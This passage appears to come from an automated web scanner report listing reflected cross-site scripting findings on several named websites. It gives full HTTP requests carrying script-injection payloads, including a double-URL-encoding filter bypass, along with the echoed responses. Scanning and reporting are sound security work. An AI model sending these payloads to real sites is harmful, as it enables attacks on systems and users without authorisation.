This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /fr/produits/eleve-jeune/gpi.aspxa9976%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25229fc951766a6 HTTP/1.1
Host: www.grics.qc.ca
Proxy-Connection: keep-alive
Referer: http://www.grics.qc.ca/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=x2wj5mnzn01z4mrxvxtfxe2t; __utmz=30083305.1305465382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30083305.861242077.1305465382.1305465382.1305465382.1; __utmc=30083305; __utmb=30083305.1.10.1305465382

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 9163
Date: Sun, 15 May 2011 13:25:31 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
   <HEAD>
       <title>404 - Page non trouv..e</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A href="mailto:Web@grics.qc.ca?subject=Page introuvable&amp;body=Ref.: fr/produits/eleve-jeune/gpi.aspxa9976"style="x:expr/**/ession(alert(1))"9fc951766a6">
...[SNIP]...

3.57. http://www.grics.qc.ca/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grics.qc.ca
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1586%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252277ea5a6a870 was submitted in the REST URL parameter 1. This input was echoed as d1586"style="x:expr/**/ession(alert(1))"77ea5a6a870 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /imagesd1586%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252277ea5a6a870/favicon.ico HTTP/1.1
Host: www.grics.qc.ca
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=x2wj5mnzn01z4mrxvxtfxe2t; __utmz=30083305.1305465382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30083305.861242077.1305465382.1305465382.1305465382.1; __utmc=30083305; __utmb=30083305.1.10.1305465382

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 9135
Date: Sun, 15 May 2011 13:18:40 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
   <HEAD>
       <title>404 - Page non trouv..e</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A href="mailto:Web@grics.qc.ca?subject=Page introuvable&amp;body=Ref.: imagesd1586"style="x:expr/**/ession(alert(1))"77ea5a6a870/favicon.ico">
...[SNIP]...

3.58. http://www.grics.qc.ca/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grics.qc.ca
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b60%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25225b4ba2f362a was submitted in the REST URL parameter 2. This input was echoed as 91b60"style="x:expr/**/ession(alert(1))"5b4ba2f362a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /images/favicon.ico91b60%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25225b4ba2f362a HTTP/1.1
Host: www.grics.qc.ca
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=x2wj5mnzn01z4mrxvxtfxe2t; __utmz=30083305.1305465382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30083305.861242077.1305465382.1305465382.1305465382.1; __utmc=30083305; __utmb=30083305.1.10.1305465382

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 9135
Date: Sun, 15 May 2011 13:18:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
   <HEAD>
       <title>404 - Page non trouv..e</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A href="mailto:Web@grics.qc.ca?subject=Page introuvable&amp;body=Ref.: images/favicon.ico91b60"style="x:expr/**/ession(alert(1))"5b4ba2f362a">
...[SNIP]...

3.59. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetnatrgovina.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3f5a6--><script>alert(1)</script>2a5a0ebd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?3f5a6--><script>alert(1)</script>2a5a0ebd0=1 HTTP/1.1
Host: www.internetnatrgovina.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43692
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Set-Cookie: cookie_test=please_accept_for_session; expires=Tue, 14-Jun-2011 14:01:52 GMT; path=/; domain=internetnatrgovina.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 150351


       <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="si">
<head>

<!-- Bof products_new_glide module -->
<script type="text/javascript" src="jquery-1.2.3.pack.js">
...[SNIP]...
<a href="http://www.internetnatrgovina.com/index.php?3f5a6--><script>alert(1)</script>2a5a0ebd0=1&action=buy_now&products_id=3082" onclick="doBuyNowGet('http://www.internetnatrgovina.com/ajax_shopping_cart.php?3f5a6-->
...[SNIP]...

3.60. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetnatrgovina.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a3f"><script>alert(1)</script>8266b710003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21a3f"><script>alert(1)</script>8266b710003=1 HTTP/1.1
Host: www.internetnatrgovina.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43692
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Set-Cookie: cookie_test=please_accept_for_session; expires=Tue, 14-Jun-2011 14:01:44 GMT; path=/; domain=internetnatrgovina.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 150781


       <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="si">
<head>

<!-- Bof products_new_glide module -->
<script type="text/javascript" src="jquery-1.2.3.pack.js">
...[SNIP]...
<OPTION VALUE="http://translate.google.com/translate?u=http://www.internetnatrgovina.com/?21a3f"><script>alert(1)</script>8266b710003=1&amp;sl=auto&amp;tl=de">
...[SNIP]...

3.61. http://www.mailsite.com/common/reporterror.asp [Company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8e9"><script>alert(1)</script>a551140aa99 was submitted in the Company parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /common/reporterror.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298
Content-Length: 88

WebPage=UserRoomAccessIssue&LeadId=&Company=4b8e9"><script>alert(1)</script>a551140aa99&Name=&Email=&Phone=&Subject=&CallMe=Call+Me

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:04:57 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1748


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Company VALUE="4b8e9"><script>alert(1)</script>a551140aa99" SIZE=30 MAXLENGTH=30>
...[SNIP]...

3.62. http://www.mailsite.com/common/reporterror.asp [Email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1c99"><script>alert(1)</script>5f38dc1c19f was submitted in the Email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /common/reporterror.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298
Content-Length: 88

WebPage=UserRoomAccessIssue&LeadId=&Company=&Name=&Email=f1c99"><script>alert(1)</script>5f38dc1c19f&Phone=&Subject=&CallMe=Call+Me

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1748


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Email VALUE="f1c99"><script>alert(1)</script>5f38dc1c19f" SIZE=30 MAXLENGTH=100>
...[SNIP]...

3.63. http://www.mailsite.com/common/reporterror.asp [Name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 163d0"><script>alert(1)</script>95fd9f3ee90 was submitted in the Name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /common/reporterror.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298
Content-Length: 88

WebPage=UserRoomAccessIssue&LeadId=&Company=&Name=163d0"><script>alert(1)</script>95fd9f3ee90&Email=&Phone=&Subject=&CallMe=Call+Me

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:02 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1748


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Name VALUE="163d0"><script>alert(1)</script>95fd9f3ee90" SIZE=30 MAXLENGTH=30>
...[SNIP]...

3.64. http://www.mailsite.com/common/reporterror.asp [Phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df93c"><script>alert(1)</script>1a295be864 was submitted in the Phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /common/reporterror.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298
Content-Length: 88

WebPage=UserRoomAccessIssue&LeadId=&Company=&Name=&Email=&Phone=df93c"><script>alert(1)</script>1a295be864&Subject=&CallMe=Call+Me

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:11 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1747


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Phone VALUE="df93c"><script>alert(1)</script>1a295be864" SIZE=30 MAXLENGTH=30>
...[SNIP]...

3.65. http://www.mailsite.com/common/reporterror.asp [Subject parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bfc8"><script>alert(1)</script>c1760f9a5931297f6 was submitted in the Subject parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /common/reporterror.asp?WebPage=UserRoomAccessIssue&LeadId=&Company=&Name=&Email=&Phone=&Subject=3bfc8"><script>alert(1)</script>c1760f9a5931297f6&CallMe=Call+Me HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:16 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1793


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Subject VALUE="3bfc8"><script>alert(1)</script>c1760f9a5931297f6" SIZE=30 MAXLENGTH=50>
...[SNIP]...

3.66. http://www.mailsite.com/common/reporterror.asp [WebPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the WebPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 538a8"><script>alert(1)</script>541646c2d83ed52 was submitted in the WebPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /common/reporterror.asp?WebPage=UserRoomAccessIssue538a8"><script>alert(1)</script>541646c2d83ed52&LeadId=&Company=&Name=&Email=&Phone=&Subject=&CallMe=Call+Me HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:04:47 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1791


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE="HIDDEN" NAME="WebPage" VALUE="UserRoomAccessIssue538a8"><script>alert(1)</script>541646c2d83ed52">
...[SNIP]...

3.67. http://www.mailsite.com/common/reporterror.asp [webpage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the webpage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3060"><script>alert(1)</script>b8786e930d9 was submitted in the webpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/reporterror.asp?webpage=UserRoomAccessIssueb3060"><script>alert(1)</script>b8786e930d9 HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/download.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:04:40 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1787


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE="HIDDEN" NAME="WebPage" VALUE="UserRoomAccessIssueb3060"><script>alert(1)</script>b8786e930d9">
...[SNIP]...

3.68. http://www.mailsite.com/portal/trial.asp [Company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3238"><script>alert(1)</script>590a7eea2a0860cbb was submitted in the Company parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=c3238"><script>alert(1)</script>590a7eea2a0860cbb&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:09:37 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="30" maxlength="40" name="Company"
value="c3238"><script>alert(1)</script>590a7eea2a0860cbb" ID="Text7">
...[SNIP]...

3.69. http://www.mailsite.com/portal/trial.asp [Email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28d3"><script>alert(1)</script>067b77b653664807 was submitted in the Email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

